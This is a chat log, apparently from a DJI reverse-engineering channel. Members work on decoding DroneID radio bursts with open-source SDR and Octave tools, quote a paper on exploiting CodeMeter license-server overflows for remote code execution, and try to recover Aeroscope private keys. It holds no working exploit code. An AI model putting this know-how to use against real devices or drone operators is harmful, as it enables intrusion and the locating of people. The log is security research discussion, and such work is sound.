[2022-04-17 18:44:07] skyninja : The private key for each Aeroscope is RSA encrypted. The passphrase is derived in the firmware. Does anybody knows how this work? How can I derive the passphrase from say the serial number.

[2022-04-17 19:22:40] hostile : some interesteing detail on CodeMeter API and encryption for anyone thinking about exploiting the overflow. https://f.hubspotusercontent20.net/hubfs/2553528/License%20to%20Kill%20Leveraging%20License%20Management%20to%20Attach%20ICS%20Networks.pdf

[2022-04-17 19:24:06] hostile : also some solid detail on the license file format which could be used to exploit a different overflow

[2022-04-17 19:25:07] hostile : ``` With a reliable payload intact, we set our eyes on a better CodeMeter API interface we could take advantage of to inject a malicious license file on demand. The server intends for local clients only to connect to it with a local nonce, but how secure With a reliable payload intact, we set our eyes on a better CodeMeter API interface we could is it? With some research into its communication we found a way to crack the seed of the encryption key to create proper take advantage of to inject a malicious license file on demand. The server intends for local API requests and parse their responses. We developed this into a CodeMeter API in Python that we could execute remotely, clients only to connect to it with a local nonce, but how secure is it? With some research into its no authentication required, to connect to the CodeMeter server and load our custom licenses as we pleased. By leveraging communication we found a way to crack the seed of the encryption key to create proper API our new API capabilities we were able to find additional memory corruption bugs and eventually reach pre-auth remote code execution and consequently, we now had CodeMeter in our command ```

[2022-04-17 19:26:41] hostile : Sadly they don't share the actual python library on github. just a sample hello packet. https://github.com/claroty/License-to-Kill/blob/master/codemeter_port_check.py

[2022-04-17 19:28:33] hostile : which ones are you using @skyninja looks like there are a few

[2022-04-17 19:28:38] hostile : ```MD5 (./WEB-INF/classes/server.jks) = 647ba0b504cee193688b8834a55b021a MD5 (./WEB-INF/classes/serverTrust.jks) = a7a6ad43519fb5ff3ee4361d314e75c1 MD5 (./data/monitor_backend_file/certificate/server.jks) = f13b6e4053a945825f1cb15036fc3dbb MD5 (./data/monitor_backend_file/certificate/serverTrust.jks) = 7839734316e9e0927c52ece17f2149fe MD5 (./data/tomcat-webapp/WEB-INF/classes/server.jks) = 647ba0b504cee193688b8834a55b021a MD5 (./data/tomcat-webapp/WEB-INF/classes/serverTrust.jks) = a7a6ad43519fb5ff3ee4361d314e75c1```

[2022-04-17 19:28:38] hostile : ``` MD5 (./data/monitor_backend_file/certificate/server.jks) = f13b6e4053a945825f1cb15036fc3dbb MD5 (./data/monitor_backend_file/certificate/serverTrust.jks) = 7839734316e9e0927c52ece17f2149fe MD5 (./data/tomcat-webapp/WEB-INF/classes/server.jks) = 647ba0b504cee193688b8834a55b021a MD5 (./data/tomcat-webapp/WEB-INF/classes/serverTrust.jks) = a7a6ad43519fb5ff3ee4361d314e75c1```

[2022-04-17 20:48:25] skyninja : the upper two. i did not see the lower two, thanks!

[2022-04-18 00:30:14] lmore377 : lmore377 joined the channel.

[2022-04-18 01:58:07] hostile : fwiw @atlantic this is waht the open_service is running.

[2022-04-18 01:58:07] hostile : fwiw @skyninja this is waht the open_service is running.

[2022-04-18 07:08:52] atlantic : dji smart enough to choose non descriptive names.

[2022-04-18 07:10:04] atlantic : _enc is probably because it is protected by codemeter.

[2022-04-18 09:19:58] skyninja : I do not have ./data/tomcat-webapp/

[2022-04-18 09:21:04] skyninja : data/monitor_backend_file is in the install package. But i did not install it.

[2022-04-18 09:21:54] skyninja : there are no .jks files in the aeroscope.tar. so i assume they are dynamically generated.

[2022-04-18 12:38:41] hostile : you are correct _enc is because it is code meter protected. Unjar the .war file...

[2022-04-18 12:38:56] hostile : you'll find the tomcat-webapp folder inside the .war

[2022-04-18 17:48:16] skyninja : thanks. found the key and cert. Cert is 100% the same. Key is different but also not matching.

[2022-04-18 19:42:20] airiver : airiver joined the channel.

[2022-04-19 02:50:53] john.abbey : john.abbey joined the channel.

[2022-04-19 03:58:25] hostile : fresh hot tamales.

[2022-04-19 03:58:31] hostile : https://github.com/proto17/dji_droneid

[2022-04-19 04:05:31] proto : the latest updates allow demodulation down to the drone id payload. there is a C++ program that needs to be built (https://github.com/proto17/dji_droneid/blob/main/cpp/remove_turbo.cc) first. then you can take a recording with your favorite sdr (save as complex single precision floats!), edit the first few lines of process_file.m (https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/process_file.m#L26) to match your file path, and recording parameters, then run `process_file` and wait. curious to see if anyone else has any luck with it. i took really clean recordings with an ettus b205-mini of my dji mini 2 and it seems to work pretty well

[2022-04-19 04:06:20] proto : constellation points are much cleaner now that the first zc is used for some seriously bare bones equalization

[2022-04-19 04:08:02] proto : oh, and while this code does work in octave, it's crazy slow compared to matlab. so if you have matlab and the signals and comms toolboxes, i really recommend that. poor octave seems to only ever use one core where matlab is using all available cores

[2022-04-19 04:09:03] hostile : ```You can get octave to use some libraries like ATLAS which utilize multiple cores. So while Octave only uses one core, when you encounter a heavy operation, octave calls functions in ATLAS that utilize many CPU's.``` https://stackoverflow.com/questions/11889118/get-gnu-octave-to-work-with-a-multicore-processor-multithreading

[2022-04-19 04:09:08] hostile : not sure if applicable but FWIW

[2022-04-19 04:15:00] hostile : got me all excited but I gotta go to bed

[2022-04-19 04:15:07] hostile : ``` sudo apt-get install octave-signal ```

[2022-04-19 04:15:20] hostile : ``` ciajeepdoors@AeroScopeWrecker:~/dji_droneid/cpp$ wget https://raw.githubusercontent.com/d-bahr/CRCpp/master/inc/CRC.h ```

[2022-04-19 04:15:31] hostile : ``` ciajeepdoors@AeroScopeWrecker:~/dji_droneid/cpp$ g++ -Wall remove_turbo.cc -o remove_turbo -I. -I/usr/local/include -L/usr/local/lib -lturbofec ```

[2022-04-19 04:17:34] hostile : ``` ciajeepdoors@AeroScopeWrecker:~/dji_droneid/cpp$ ./remove_turbo Usage: ./remove_turbo <input_file> <input_file> => Path to file containing 7200 ASCII '1' and '0' values This program will remove the Turbo coding and rate matching found in DJI DroneID signals and output the decoded frame in hex to the terminal It has only been tested against the DJI Mini 2 ```

[2022-04-19 04:17:43] hostile : so can hopefully test tomorrow

[2022-04-19 06:47:35] atlantic : and the wonderful thing about the Turbocodes is that if you get a bad constellation like this (I had too much gain when recording), you still get valid decodes.

[2022-04-19 15:09:34] hostile : for anyone following along, make sure to both install, and load octave signal via the RC file.

[2022-04-19 15:09:40] hostile : ``` ciajeepdoors@AeroScopeWrecker:~/dji_droneid$ cd matlab/updated_scripts/ ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ octave process_file.m octave: X11 DISPLAY environment variable not set octave: disabling GUI features warning: the 'fir1' function belongs to the signal package from Octave Forge which you have installed but not loaded. To load the package, run 'pkg load signal' from the Octave prompt. Please read <https://www.octave.org/missing.html> to learn how you can contribute missing functionality. error: 'fir1' undefined near line 36 column 15 error: called from process_file at line 36 column 13 ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ echo "pkg load signal" >> ~/.octaverc ```

[2022-04-19 15:11:18] hostile : In this case my sample file is actually null, but you can see the complaint goes away

[2022-04-19 15:11:21] hostile : ``` $ octave process_file.m octave: X11 DISPLAY environment variable not set octave: disabling GUI features There are 0 samples in "/tmp/2437MHz_30.72MSPS.fc32" error: Did not find any bursts error: called from assert at line 94 column 11 process_file at line 46 column 1 ```

[2022-04-19 15:26:51] hostile : Noticing my BladeRF caps in SC16, where as @proto is looking for .fc32 file format. https://nuand.com/libbladeRF-doc/v2.2.1/group___s_t_r_e_a_m_i_n_g___f_o_r_m_a_t.html

[2022-04-19 15:56:40] shuke : shuke joined the channel.

[2022-04-19 17:40:06] atlantic :

[2022-04-19 17:45:53] jan2642 : It's indeed crazy slow in Octave. I could see the bursts in SDR++ so I'm pretty sure there's some in the recording but it has been processing for minutes already. And indeed, it uses only a single core...

[2022-04-19 17:54:01] jan2642 : Maybe checking for signal strength first before trying to correlate might speed things up ?

[2022-04-19 18:14:11] jan2642 : I got tired waiting and used inspectrum to hunt for them and get a smaller file.

[2022-04-19 18:14:14] jan2642 :

[2022-04-19 18:19:21] jan2642 : This matches more or less with the screenshot of baudline on the wiki (The download of baudline doesn't work on my Mac). I extracted this to a separate file and tried again with Octave but got this error: ``` There are 18432 samples in "../droneid.fc32" error: abs_scores(18434): out of bound 18432 (dimensions are 18432x1) error: called from find_zc_indices_by_file at line 82 column 16 extract_bursts_from_file at line 34 column 13 process_file at line 45 column 8 ``` Then I selected some additional data before and after the signal (as in the screenshot) and tried again: ``` There are 21600 samples in "../droneid.fc32" error: product: nonconformant arguments (op1 is 1x0, op2 is 1x19860) error: called from extract_bursts_from_file at line 49 column 23 process_file at line 45 column 8 ```

[2022-04-19 18:27:14] jan2642 : Ok, made the file about 3 times the size of the data because `read_complex_floats` was called with a negative offset

[2022-04-19 18:33:15] jan2642 : Still no luck: ``` warning: Found 597 one(s) in the first symbol which should be all zeros warning: called from process_file at line 120 column 9 [ERROR] CRC did not zero out. Got fe6d01 after calculation ```

[2022-04-19 18:36:10] atlantic : You've got Ocusync 1 or 3. The all zero symbol is only on Ocusync 2. Apparently the code only does Ocusync 2.

[2022-04-19 18:40:34] jan2642 : This was taken with a mavic 2 zoom

[2022-04-19 18:40:38] atlantic : note to @proto : easiest is just ignore the first symbol in Ocusync 2

[2022-04-19 18:41:19] atlantic : so correlate with ZC and take the two symbols before that.

[2022-04-19 18:41:19] atlantic : so correlate with ZC and that the two symbols before that.

[2022-04-19 18:42:11] atlantic : i can tell from your waterfall that the all zero symbol is not there.

[2022-04-19 18:45:53] atlantic : Mavic 2 Zoom has Ocusync 2. So I was wrong, it has nothing to do with Ocusync version. But the first all-zero symbol is missing in your waterfall.

[2022-04-19 18:46:51] jan2642 : It still has the firmware it came with: 00.06.0000 Maybe that's the reason ?

[2022-04-19 18:48:16] atlantic : I don't know. Can be.

[2022-04-19 18:51:26] jan2642 : I'll upgrade it and check again.

[2022-04-19 18:51:48] atlantic : or just wait for @proto to change the code

[2022-04-19 18:59:11] jan2642 : He's already skipping the first symbol:

[2022-04-19 19:05:43] atlantic : % - Adjust for frequency offset based on the offset found using the first OFDM symbol's cyclic prefix

[2022-04-19 19:07:15] atlantic : so apparently it is used. i assume some things go wrong when the first symbol is not there, but I did not checked the source code on details. I am pretty sure it fails because your sample does not have this first all-zero symbol.

[2022-04-19 19:22:06] jan2642 : ok, I'll wait for him to take a look. Maybe these samples without an all-zero symbol could be useful.

[2022-04-19 21:09:06] proto : Oh, that's a good point. Didn't think there would be cases where that all zeros symbol wouldn't exist O.o i was keeping it as a sanity check that things were working properly. i'll just use the crc24 and call it a day

[2022-04-19 21:10:10] proto : i'll just change to using the first true data symbol as the coarse freq offset measurement

[2022-04-19 21:29:15] proto : does anyone know if the drones that don't send 9 ofdm symbols use a long cyclic prefix on the first symbol they do transmit? my mini 2 sends all 9 symbols, so i don't have a reference :(

[2022-04-19 21:32:46] jan2642 : How long is a symbol in us ?

[2022-04-19 21:33:48] proto : https://www.sharetechnote.com/html/Handbook_LTE_PhyParameter_DL_FDD.html 5.2us for long 4.69 for short

[2022-04-19 21:39:40] jan2642 : Then I would guess it's a short cyclic prefix.

[2022-04-19 21:40:30] jan2642 :

[2022-04-19 21:41:15] proto : that was my hope. prevents having to figure out which kind of drone it is O.o so i can just skip long cyclic prefix + fft size and call it a day :) thank you!

[2022-04-19 21:43:36] jan2642 : First symbol. The red rectangle is much closer to 4.69 than 5.2

[2022-04-19 21:44:03] jan2642 : It's a mavic 2 but with very old firmware 00.06.00

[2022-04-19 22:21:35] proto : the repo has been updated so that it *should* ignore the first symbol. it will still extract the burst as if it were 9 symbols long, but won't use the first symbol for anything (CFO estimation or checking the scrambler)

[2022-04-19 22:22:03] proto : now the second symbol (first if you have a drone that only sends 8 symbols) is used for CFO

[2022-04-19 22:28:12] proto : hrm, my phase offset of *bad* sometimes

[2022-04-19 22:44:46] proto : hopefully the rest of you won't encounter that nastiness. i think it's fixed

[2022-04-19 22:45:05] proto : still not amazing, but definitely good enough considering how much parity is in this signal

[2022-04-19 22:45:43] proto : the image above is 6 bursts from a collect i made that were demodulated with the `process_file.m` script

[2022-04-20 02:48:10] proto : does anyone know if the hopping sequence of drone id is predictable? just from watching some of the individual channels it doesn't look like drone id stays on the same channel for specific amounts of time. someone here posted a picture of the hopping sequence making a sinusoidal shape in a spectrogram, but i haven't noticed that with the mini 2. but, i don't have a wide enough sdr to see all of the channels at once =\

[2022-04-20 02:48:47] proto : would be really nice if i could setup gnuradio to hop along with drone id so that there wasn't so much dead time waiting for the channel to become active again

[2022-04-20 04:13:32] hostile : for anyone following along, I'm trying to take caps now via UVD using Soapy to talk to the BladeRF so I can get samples in .fc32 format as mentioned earlier today

[2022-04-20 04:13:32] hostile : for anyone following along, I'm trying to take caps now via UHD using Soapy to talk to the BladeRF so I can get samples in .fc32 format as mentioned earlier today

[2022-04-20 04:13:50] hostile : ``` ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ uhd_rx_cfile --samp-rate 30.72e6 -f 2.422e9 -v /tmp/aaa.fc32 -N $((30720000 * 10)) [INFO] [UHD] linux; GNU C++ version 9.2.1 20200304; Boost_107100; UHD_3.15.0.0-2build5 [INFO] [UHDSoapyDevice] bladerf_open_with_devinfo() [INFO] [UHDSoapyDevice] bladerf_get_serial() = a0384546e95d4b5388979e6fff88287c [INFO] [UHDSoapyDevice] setSampleRate(Rx, 0, 4.000000 MHz), actual = 4.000000 MHz [INFO] [UHDSoapyDevice] setSampleRate(Tx, 0, 4.000000 MHz), actual = 4.000000 MHz [INFO] [UHDSoapyDevice] setSampleRate(Rx, 0, 30.720000 MHz), actual = 30.720000 MHz [UHD_RX] Defaulting to mid-point gains: [UHD_RX] Channel 0 gain: 71.0 dB [UHD_RX] Motherboard: bladerf2 (a0384546e95d4b5388979e6fff88287c) [UHD_RX] Daughterboard: Unknown (no serial, RX, 0:0 1:1) [UHD_RX] Receiving on 1 channels. [UHD_RX] Rx gain: 71.0 [UHD_RX] Rx frequency: 2422000000.0 [UHD_RX] Rx baseband frequency: 2.422G [UHD_RX] Rx DDC frequency: -2.0 [UHD_RX] Rx Sample Rate: 30.72M [UHD_RX] Receiving 307.2M samples. [UHD_RX] Writing 32-bit complex floats [UHD_RX] Output file(s): /tmp/aaa.fc32 0000[INFO] [UHDSoapyDevice] bladerf_close() ```

[2022-04-20 04:16:26] proto : working on some gnuradio oot modules so this can be done live. prob gonna take a few days

[2022-04-20 04:20:10] hostile : ``` ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ time octave process_file.m octave: X11 DISPLAY environment variable not set octave: disabling GUI features There are 307200000 samples in "/tmp/aaaa.fc32" ```

[2022-04-20 04:20:12] hostile : ...

[2022-04-20 04:20:23] hostile : I'll let ya know how long it takes, and what it says in a bit!

[2022-04-20 04:25:21] hostile : lol @proto how well these straight up clone Ettus boards work?

[2022-04-20 04:25:27] hostile :

[2022-04-20 04:26:08] hostile : https://www.ebay.com/itm/174666761789

[2022-04-20 04:26:32] proto : i've seen those a lot. the price isn't far off from what you can buy a real b205-mini for

[2022-04-20 04:27:19] hostile : aye minus case, and clone parts... gamble to save a few hundo

[2022-04-20 04:27:50] hostile : that B200 is a bit more of a deal tho

[2022-04-20 04:28:01] hostile : vs https://www.ettus.com/all-products/ub200-kit/

[2022-04-20 04:28:19] proto : hmm, well, i got mine from digilentinc.com for ~ $800 but they are out of stock now. so yeah, the price is pretty good, but i don't know anything about the quality of the clones

[2022-04-20 04:28:49] hostile : yeah with stock shortages was wondering how they perform

[2022-04-20 04:29:56] proto : almost all sdrs with a freq range of 60 MHz to 6 GHz and sample rates up to 64 MSPS (56 usable) are using the ad9361 or ad9364 rf chips

[2022-04-20 04:30:15] proto : so if it uses that chip, then it's prob okay. but sdr's are super sensitive to shitty board design

[2022-04-20 04:30:43] hostile : aye that was my concern. I figured if someone had tried em we'd have heard one way vs the other. =]

[2022-04-20 04:30:51] proto : so for dorking around it's prob fine. but for serious work you're likely to encounter issues if the boards aren't all that great

[2022-04-20 04:31:00] hostile : I'm set for now with the Blade & HackRF, but folks always looking for options.

[2022-04-20 04:31:55] hostile : need the cheapest options so we can have a DroneID trader website. We all spool em up, let em sit, and start collecting historic data on flights lol

[2022-04-20 04:32:40] proto : ahhhh yeah, gonna need something on the higher end =\ no rtlsdr for this

[2022-04-20 04:33:08] hostile :

[2022-04-20 04:33:37] proto : btw, the chances are that the collect you have doesn't have any drone id. one second of data is almost certainly not going to happen to end up hearing a drone id burst seeing as how they hop around a lot. you're prob better off looking at the samples in baudline before running the octave script that takes for facking ever

[2022-04-20 04:33:45] proto : this issue will be solved with the gnuradio blocks

[2022-04-20 04:34:11] proto : gnuradio will look at the samples in real time and extract just the bursts

[2022-04-20 04:34:17] hostile : yeah wasn't expecting much on the first stab at it. Just wanted to get something capped before I slept.

[2022-04-20 04:35:09] hostile : at this point most interested in how long it takes this slow ass laptop to chew through that capture as is, at face value.

[2022-04-20 04:35:19] hostile : debate on if I wanna pay for a matlab license or not

[2022-04-20 04:35:45] proto : i wouldn;t for this. gnuradio will make the matlab obsolete. matlab and octave are for prototyping.

[2022-04-20 04:36:29] proto : if the signal changes, then matlab/octave are useful for trying to find out what changed as gnuradio is a shit show for debugging signals

[2022-04-20 04:36:37] hostile : I had one for other shit a while back. Probably just looking for an excuse at this point.

[2022-04-20 04:36:52] hostile : bed for now! I'll post the timing on that cap when I wake up.

[2022-04-20 04:41:26] hostile : welp it shit the bed lol

[2022-04-20 04:41:29] hostile : ``` There are 307200000 samples in "/tmp/2437MHz_30.72MSPS.fc32" error: out of memory or dimension too large for Octave's index type error: called from extract_bursts_from_file at line 41 column 12 process_file at line 43 column 8 real 21m8.216s user 20m49.641s sys 0m16.252s ```

[2022-04-20 04:41:32] hostile : need more ram!

[2022-04-20 04:42:24] proto : you can drop the number of samples that it reads in at a time and that might help https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/process_file.m#L35

[2022-04-20 04:43:04] proto : but it does still have to store 30.72e6 * 4 bytes of correlation data though that shouldn't kill a laptop

[2022-04-20 04:43:31] proto : that or there is a bug O.O

[2022-04-20 04:45:03] icer : You getting overruns?

[2022-04-20 04:45:41] icer : I’m waiting for what comes after the ad936X line

[2022-04-20 04:46:21] proto : seems that we have the adrv9009 and xilinx (amd) rfsoc line

[2022-04-20 04:46:38] proto : adrv9009 being the successor to the ad936x family imo

[2022-04-20 04:46:45] proto : lots more bandwidth

[2022-04-20 04:48:25] icer :

[2022-04-20 04:48:49] icer : How much more?

[2022-04-20 04:49:30] icer : 200mhz IBW

[2022-04-20 04:49:39] icer : 4 X the old chip

[2022-04-20 04:50:10] proto : the rfsoc's can view ghz at a time, but can't actually process that much data. the adrv9009 i *think* can do > 200 MHz on multiple channels

[2022-04-20 04:50:18] proto : with an observation port that goes higher

[2022-04-20 04:51:03] proto : https://www.analog.com/en/products/adrv9009.html 200 MHz max for the normal rx chain, 450 mhz observation port

[2022-04-20 04:51:40] proto : the new ettus x410 uses an rfsoc from xilinx (amd) https://www.ettus.com/all-products/usrp-x410/

[2022-04-20 04:52:04] icer : Oh wow,epic is already shipping it

[2022-04-20 04:52:07] icer : https://epiqsolutions.com/rf-transceiver/sidekiq-x4/

[2022-04-20 04:52:39] proto : oh epiq. i wish i could get my hands on some of the x4's. we have the z2's and are hopefully going to get some z3's soon

[2022-04-20 04:53:17] icer : 25k

[2022-04-20 04:53:27] icer : I have some z2

[2022-04-20 04:53:30] proto : yeah, facking expensive O.o

[2022-04-20 04:53:37] proto : the sdk for epiq is crazy expensive

[2022-04-20 04:54:34] icer : Yeah

[2022-04-20 04:54:34] proto : up to 5gsps adcs :drooling_face:

[2022-04-20 04:54:42] icer : But I really want a phone with one in it

[2022-04-20 04:55:00] proto : that would be pretty cool for sure

[2022-04-20 04:55:23] icer : When I bought my equip ask it was a laptop and two pci receivers for 30k

[2022-04-20 04:55:27] proto : this little guy is pretty close to phone form factor https://epiqsolutions.com/rf-transceiver/matchstiq-z/

[2022-04-20 04:55:48] proto : jeebus that's a lot of $$

[2022-04-20 04:56:35] icer :

[2022-04-20 05:01:16] jan2642 : Still no luck:

[2022-04-20 05:01:22] icer : I’d love to have a m.2 or nvme connected SDR. Usb is buggy

[2022-04-20 05:01:47] icer : What y’all trying to do

[2022-04-20 05:03:23] proto : well that's just goofy. are you sure the signal is centered? do you know how to plot the time domain? something like `figure(1); plot(10 * log10(abs(burst).^2))`

[2022-04-20 05:03:29] jan2642 : It errors out almost immediately because of CRC errors. It finds over 300 bursts in a file which has only one. If I let it iterate over all of them, ignoring the CRC error, there's one burst where I see almost clean QPSK constellations

[2022-04-20 05:04:01] proto : that's *really* strange

[2022-04-20 05:04:39] proto : the bursts are detected by correlating for the zc sequence which shouldn't just randomly happen O.o are you using octave or matlab?

[2022-04-20 05:04:51] jan2642 : Might be an octave compatibility thing.

[2022-04-20 05:05:08] proto : i'd be interested in seeing an output of baudline if you are running on a linux system

[2022-04-20 05:05:19] jan2642 : GNU Octave, version 6.4.0

[2022-04-20 05:05:34] jan2642 : It's a Mac.

[2022-04-20 05:05:42] proto : hmm, i'm using 5.2.0 (thanks ubuntu)

[2022-04-20 05:06:03] proto : but the strange part is that you have what looks like a good zc in symbol 4

[2022-04-20 05:06:03] jan2642 : I'll try to record some bursts today that I can share (not at my house ;-) )

[2022-04-20 05:06:10] proto : no energy in the first three symbols tho

[2022-04-20 05:06:54] proto : then you have energy after the zc

[2022-04-20 05:07:34] proto : i really wish coordinates weren't in the facking things so we could share files without issues :(

[2022-04-20 05:07:43] proto : of course, then i prob wouldn't be doing this lol

[2022-04-20 05:11:00] icer : That’s weird

[2022-04-20 05:14:57] icer : Are you bucketing with FFT size?

[2022-04-20 05:20:03] proto : i use a fir filter with the coefficients being the conjugate of the zc sequence https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/find_zc_indices_by_file.m#L19

[2022-04-20 05:20:35] proto : and maintain the filter state between chunks being read in from disk (to help those without huge amounts of avail ram) https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/find_zc_indices_by_file.m#L52

[2022-04-20 05:22:30] proto : @jan2642 apologies for having to leave you hanging, but i need to go to sleep. it's crazy late here :( i'll think about what can be done to help debug your signal. in the mean time, would you mind checking that the signal you recorded is centered and that you set the correct config lines https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/process_file.m#L30-L32

[2022-04-20 05:24:16] proto : mainly make sure the sample rate is correct, and that if you did record the signal off center to remove the dc spike that you set the correct `file_freq_offset`. if either of those are incorrect then the demod will 100% fail. the issue of you not seeming to have energy before the ZC is super curious. what drone is that?

[2022-04-20 05:24:42] proto : oh, and the latest code in the repo saves off all constellation plots to a folder called `images`

[2022-04-20 05:25:02] proto : so you should be able to see exactly how many bursts were found and which ones had valid constellations

[2022-04-20 05:25:14] proto : anywho, i'm out. later all!

[2022-04-20 05:54:22] atlantic :

[2022-04-20 05:58:22] atlantic : that is because you use symbol 4 for channel estimatation, ( / garbage ) * same garbage = 1

[2022-04-20 05:58:22] atlantic : that is because you use symbol 4 for channel estimatation, (1 / garbage ) * same garbage = 1

[2022-04-20 05:58:22] atlantic : that is because you use symbol 4 for channel estimatation, ( ZC / garbage ) * same garbage = ZC

[2022-04-20 09:06:07] tmbinc : @proto the hopping is the uplink, not droneid. If you look at the PNG, you can see that droneid is at a constant frequency.

[2022-04-20 09:07:42] tmbinc : I am in the middle of understanding the code that generates the hopping sequence (from the S1 firmware), there are a few components (including a goldseq with 0x12345678 - definitely unrelated to the packet scrambling, so highly suspicious usage) and look up tables

[2022-04-20 09:08:03] tmbinc : I can also parse the logs that the firmware produces to some extend and see the hopping there

[2022-04-20 09:08:29] tmbinc : But I haven't been able to connect all the dots together yet...

[2022-04-20 09:08:36] tmbinc : But again - this only affects the uplink, not droneid

[2022-04-20 10:27:30] jan2642 : @proto the length of indices was way too high for just one burst so I've been increasing `correlation_threshold` to lower it. Even at 0.999 it still had over 200 items so I went over 1 and still got a lot. At 10 I only got 2, at 15 there was only 1 and the decoding worked !

[2022-04-20 10:28:15] jan2642 : Not as clean as your recording ;-)

[2022-04-20 21:42:07] wavesahead : wavesahead joined the channel.

[2022-04-20 21:43:42] wavesahead : hi

[2022-04-20 22:05:40] wavesahead : saw the ettus clones message scrolling up... they arent clones, just factory rejects. the parts are not qa'd and you also gamble with the possibility of getting an ewaste unit repaired or sold as is. tons of gear out of china like that, ebay is the amazon of aliexpress and taobao goods for those.

[2022-04-20 22:10:02] wavesahead : i take it you guys dont have a tx component yet, right?

[2022-04-20 22:19:52] czokie : A quick confirmation that Russia is using Aeroscope directly linked to their targeting. Multiple reports of precision targeting, so this guy did a test - Setup a camera at landing spot, and then moved away. Moments later, incoming fire. https://www.youtube.com/watch?v=ynmmwCEWEsE

[2022-04-20 22:21:19] czokie : The guy that shot this video will be on live tomorrow on https://www.youtube.com/kenheron/live to talk about the "receiving" end of this russian fun.

[2022-04-20 22:21:19] czokie : The guy that shot this video will be on live in the near future on https://www.youtube.com/kenheron/live to talk about the "receiving" end of this russian fun. But the video will be shared there tomorrow.

[2022-04-20 22:23:36] wavesahead : it is widely confirmed that kadyrovtsy are using aeroscope and other units in the dpr since the beginning.

[2022-04-20 22:24:08] czokie : True - but just seeing the "impact" of that kinda brings it home a little.

[2022-04-20 22:24:25] wavesahead : the most useful information comes out in the native telegram groups

[2022-04-20 22:25:15] wavesahead : i also have access to a few russian groups that are not publicly listed with satcom stuff and some aeroscope footage trickled there

[2022-04-20 22:25:30] wavesahead : so, it is a fact.

[2022-04-20 22:27:26] wavesahead : Aerorozvidka moved away from cots drones and they use their own designs with mortar shell payloads using 3d printed stabilizers

[2022-04-20 22:29:24] wavesahead :

[2022-04-20 22:29:39] wavesahead : some recent dji sighting in azovstal

[2022-04-20 22:29:50] wavesahead :

[2022-04-20 23:03:17] czokie : I’ve just been debunked. Misinformation. Disregard

[2022-04-20 23:04:21] hostile : https://dji-rev.com/dji-rev/pl/hb8ihrtw8pdp5cqxweqhs6qnra not for Occusync. Only Wifi.

[2022-04-20 23:05:08] hostile : I pushed for more accurate info on that specific topic @czokie https://twitter.com/d0tslash/status/1502329015910207492

[2022-04-20 23:05:38] czokie : Trust hostile to have every post under the sun on the topic

[2022-04-20 23:06:36] hostile : https://twitter.com/adamlisberg/status/1501994676018200583

[2022-04-20 23:06:47] hostile : and be directly involved in trying to get good info out. ;)

[2022-04-20 23:09:02] hostile : https://twitter.com/d0tslash/status/1507601552416161792?s=20&t=o0fyCWQLec6fMRqbkjRB_Q

[2022-04-20 23:09:24] hostile : https://twitter.com/d0tslash/status/1507599398385168385?s=20&t=o0fyCWQLec6fMRqbkjRB_Q

[2022-04-20 23:56:54] czokie : For the benefit of others, I had received the above video forwarded to me - with someone claiming to have been present at the time of this "test". Hostile - you're the "snopes" of the drone world. Thanks for that.

[2022-04-21 00:04:37] hostile : I'm back bitches! lol

[2022-04-21 00:07:13] hostile : now just the same. I do want to point out that I'm not at all downplaying the fact that it is trivial to use CUAS coordinates to augment firing of artillery. Both DJI droneID, and other EW, CUAS platforms have the exact same capability with regard to the ability to ruin someones OPSEC via signal propagation & subsequent analysis. The video above does indeed adequately represent the threat, my only beef with the representation is that it is a *confrimed* strike due to Aeroscope being integrated with a weapons platform. There is nothing in the video that makes such confirmations. Risk visualization, yup 100% clear as day, message received.

[2022-04-21 00:07:13] hostile : now just the same. I do want to point out that I'm not at all downplaying the fact that it is trivial to use CUAS coordinates to augment firing of artillery. Both DJI droneID, and other EW, CUAS platforms have the exact same capability with regard to the ability to ruin someones OPSEC via signal propagation & subsequent analysis. The video above does indeed adequately represent the threat, my only beef with the representation is that is is a *confrimed* strike due to Aeroscope being integrated with a weapons platform. There is nothing in the video that makes such confirmations. Risk visualization, yup 100% clear as day, message received.

[2022-04-21 01:58:49] hostile : small FYI for anyone trying to use Octave with @proto 's example code. Mind the versions as newer versions can't use the signal library https://octave.discourse.group/t/eliminating-use-of-error-state-in-octave-code/1515

[2022-04-21 01:59:33] hostile : resulting in shit like this:

[2022-04-21 02:01:39] hostile : @wavesahead IMHO... post it here. You can't just say 'some aeroscope footage trickled there... so, it is a fact.' https://dji-rev.com/dji-rev/pl/kcqacau3o3g89b5znmqermdyic

[2022-04-21 02:04:27] hostile : To my knowledge there has not been a publicly posted video confirming the claim of direct integration of Aeroscope with Artillery. And until there is, it is hard to verify the claim. Sure some units have portable aeroscopes. In theory a number of CUAS platforms have been able to decode droneID packets for years now. You don't even need an aeroscope at all. It is easy to make the correlation and point to causations and such. But I still maintain until someone posts concrete evidences *here* we should not make similar claims.

[2022-04-21 02:08:44] hostile : These claims have been relayed on via folks first hand in the situation none the less. Example here: https://dji-rev.com/dji-rev/pl/eosf66o4spfrmknn84yn3js8wh

[2022-04-21 02:10:23] hostile : I'll maintain many old crows, EW folks, and CUAS platforms are completely capable of detecting, demodulating and extracting GPS coordinates from DroneID, nevermind lightbridge (and liekly Occusyc) to the point of DUML location packets. https://dronecenter.bard.edu/files/2019/12/CSD-CUAS-2nd-Edition-Web.pdf

[2022-04-21 02:11:03] hostile : so fingering AeroScope exclusively in this problem IMHO is a red herring, and to this point an unverified claim.

[2022-04-21 02:13:11] hostile : Fingering DJI piss poor protocol decisions (droneID / RemoteID implementation), and open denial of known exploitable protocol vulnerabilities (lightbridge at the very least) is something I can however get completely down with. But please note these are two separate *problems* so to speak. 1) the mere fact that location data can be extracted either from a hacked link, or from broadcasts and 2) the privacy issues associated with both those facts.

[2022-04-21 02:15:52] hostile : the mere fact that the Enhanced Wifi drones use WEP is a bigger issue for example to me than the fact that they have droneID enabled by default. Both... can get someone killed in context.

[2022-04-21 05:33:30] areoc : areoc joined the channel.

[2022-04-21 10:52:41] wavesahead : definitely not an aeroscope only situation. and very likely that to some degree EW capabilities in more modern systems have some form of drone detection. however this is also dubious. have you seen the actual platforms they are using?

